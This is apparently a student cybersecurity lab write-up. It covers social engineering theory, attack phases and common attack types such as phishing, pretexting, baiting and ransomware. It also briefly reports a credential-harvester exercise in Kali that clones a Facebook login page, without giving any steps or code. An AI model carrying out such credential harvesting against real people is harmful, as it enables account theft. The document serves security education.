LAB EXPERIMENT NO 4

AIM: Study of Social Engineering attacks

THEORY:

1. What do you understand by Social Engineering Attacks ?

Solution : Social engineering attacks are a type of cyber attack that relies on psychological manipulation
rather than technical exploits. The goal of social engineering attacks is to trick people into revealing
sensitive information, performing an action, or giving access to a system or network. These attacks often
involve the impersonation of trusted individuals or organizations, such as bank employees or IT support
staff, and can take many forms, including phishing emails, pretexting, baiting, and more. Social engineering
attacks can be highly effective because they target the human element of cybersecurity, exploiting common
tendencies like trust, curiosity, and fear to bypass technical defenses and gain access to sensitive
information or systems.

2. What are different phases in social engineering attacks?

Solution : Social engineering attacks can be broken down into several distinct phases, each with its own set of
objectives and tactics. These phases are:
a) Reconnaissance: In this phase, the attacker gathers information about the target, including their personal
information, interests, and online behavior. This information is used to create a targeted attack that is more likely
to be successful.
b) Phishing: In this phase, the attacker sends a message, often an email, that appears to be from a legitimate source,
such as a bank or a trusted colleague. The message usually contains a link or attachment that, when clicked or
opened, installs malware on the target's system or prompts them to enter sensitive information.
c) Exploitation: In this phase, the attacker uses the access or information gained in the previous phases to exploit
the target's system or network. This may involve stealing sensitive data, installing additional malware, or taking
control of the target's computer or network.
d) Post-Exploitation: In this phase, the attacker maintains access to the target's system or network and continues to
gather information or carry out malicious activities. This phase can be ongoing and may involve multiple attacks
over an extended period of time.
Each phase of a social engineering attack is carefully planned and executed by the attacker, and can be difficult to
detect and prevent without proper security measures and awareness training.

3. What are different types of social Engineering Attacks

a. Human-based
b. Computer-based
Solution : Social engineering attacks are aimed at exploiting human psychology, rather than technical vulnerabilities,
to trick people into divulging sensitive information or performing actions that benefit the attacker. These attacks can
be broadly categorized into two types:
A ] Human-based social engineering attacks: These attacks involve direct interaction between the attacker and the
victim. Some examples of human-based social engineering attacks include:
• Phishing: In this type of attack, the attacker sends a fraudulent email or message that appears to be from a
legitimate source, such as a bank or social media platform, in an attempt to trick the victim into providing
sensitive information like login credentials, credit card numbers, or personal information.
• Pretexting: This type of attack involves creating a fake scenario or pretext to convince the victim to divulge
sensitive information or perform an action. For example, an attacker may
pose as a government official or a customer service representative to gain the victim's trust
and extract sensitive information.
• Baiting: In this type of attack, the attacker entices the victim with a reward or incentive to click on a link or
download a file that contains malware or a virus.
• Tailgating: This type of attack involves an attacker following the victim into a secure area, such as a corporate
office, by pretending to be an authorized employee or contractor.

B] Computer-based social engineering attacks: These attacks use software tools and technologies to trick victims
into divulging sensitive information or performing actions that benefit the attacker. Some examples of computer-
based social engineering attacks include:
• Malware: Malware is malicious software that is designed to infiltrate a computer system or network and steal
sensitive information or perform unauthorized actions.
• Spear phishing: This type of attack is a targeted form of phishing that is aimed at specific individuals or
organizations. Attackers use personal information gathered from social media or other sources to create a
convincing message that appears to be from a trusted source.
• Watering hole attack: In this type of attack, the attacker targets a website or online platform that is
frequently visited by the victim, and infects it with malware. When the victim visits the site, they unwittingly
download the malware onto their computer system.
• Ransomware: Ransomware is a type of malware that encrypts the victim's files or data and demands payment
in exchange for the decryption key.

4. Explore Social Engineering Toolkit in Kali and perform a Credential HarvesterAttack (You can refer
manual shared earlier: Kali Linux Social Engineering)
Solution :
Conclusion : Hence done the study of Social Engineering attacks and learned Social Engineering Toolkit in
Kali and perform a Credential Harvester Attack by creating a clone facebook login page and extracting
login information when a user enters it .